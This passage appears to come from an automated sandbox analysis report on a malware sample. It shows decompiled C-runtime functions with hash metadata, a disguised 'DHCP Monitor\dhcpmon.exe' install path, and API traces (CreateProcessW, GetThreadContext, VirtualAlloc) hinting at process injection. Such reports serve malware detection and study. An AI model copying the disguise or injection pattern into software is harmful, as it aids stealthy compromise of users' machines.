                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xabc530a
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xabc530a
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x6f7e40
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                0x00409be4
                0x00409bf1
                0x00409bf7
                0x00409bff
                0x00409c0d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00409c15
                0x00409c15
                0x00409c17
                0x00409c29
                0x00000000
                0x00000000
                0x00409c2b
                0x00409c3b
                0x00000000
                0x00000000
                0x00409c43
                0x00409c45
                0x00409c46
                0x00409c5e
                0x00409c65
                0x00000000
                0x00409c73
                0x00000000
                0x00409c6e
                0x00409bff
                0x00409bf3
                0x00409bf3
                0x00000000

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: @~o
                • API String ID: 2583163307-3815406691
                • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xabc530b
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x6e1c54
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















                0x00402e86
                0x00402eb4
                0x00402eba
                0x00402ec0
                0x00402ec8
                0x00402ecf
                0x00402ecf
                0x00402ed4
                0x00402edb
                0x00402ee2
                0x00402ef4
                0x00402efb
                0x00402f1a
                0x00402f26
                0x00402f41
                0x00402f44
                0x00402f4b
                0x00402f51
                0x00402f58
                0x00402f5b
                0x00402f5d
                0x00402f61
                0x00402f6b
                0x00402f6b
                0x00402f6d
                0x00402f73
                0x00402f76
                0x00402f78
                0x00402f7e
                0x00402f7f
                0x00402f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402f63
                0x00402f63
                0x00402f63
                0x00402f66
                0x00402f67
                0x00000000
                0x00402f63
                0x00402f53
                0x00000000
                0x00402f53
                0x00402f2c
                0x00402f31
                0x00402f33
                0x00402f35
                0x00000000
                0x00402efd
                0x00402efd
                0x00402f02
                0x00402f04
                0x00402f05
                0x00402f3a
                0x00402f3a
                0x00402f88
                0x00402f89
                0x00000000
                0x00402f92
                0x00402e8e
                0x00402e8e
                0x00402e95
                0x00402e96
                0x00402e98
                0x00000000
                0x00402e9d

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,00000104), ref: 00402EB4
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FileModuleName
                • String ID: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$pEn
                • API String ID: 514040917-1988324310
                • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
                • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 6692 Parent PID: 3292 dhcpmon.exeCOMMON

                Executed Functions

                Function 6FF854DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF855B4
                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF855DE
                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16), ref: 6FF855F5
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85617
                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000,00000000), ref: 6FF8568A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85695
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000), ref: 6FF856E0
                Memory Dump Source
                • Source File: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                • String ID:
                • API String ID: 656311269-0
                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction ID: 15a9098e55853074b10621f1050f0ea71fbece52cbfd70e14ec3269583920160
                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction Fuzzy Hash: 9161A671F00719ABDB10CFB8C884BAEBBB5AF48720F144159E926EB390DB749D41CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF86355, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 6FF86499
                • GetThreadContext.KERNELBASE(?,00010007), ref: 6FF864BC
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ContextCreateProcessThread
                • String ID: D
                • API String ID: 2843130473-2746444292
                • Opcode ID: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction ID: a6af290f3ef0cbee9f56d0f7705cb67fbf97aec50f8ccd2cf053d0318e821e26
                • Opcode Fuzzy Hash: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction Fuzzy Hash: D2A1E571E54209EFDB40DFA8C980BAEBBB5BF09314F104465E526EB290E771AE81CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF850D8, Relevance: 7.8, APIs: 5, Instructions: 274fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF85B65
                Memory Dump Source
                • Source File: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction ID: 46320f58fad21e60f9fa573cf4e1432c4d033ccb93c1fedba2f16b06173cc0a7
                • Opcode Fuzzy Hash: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
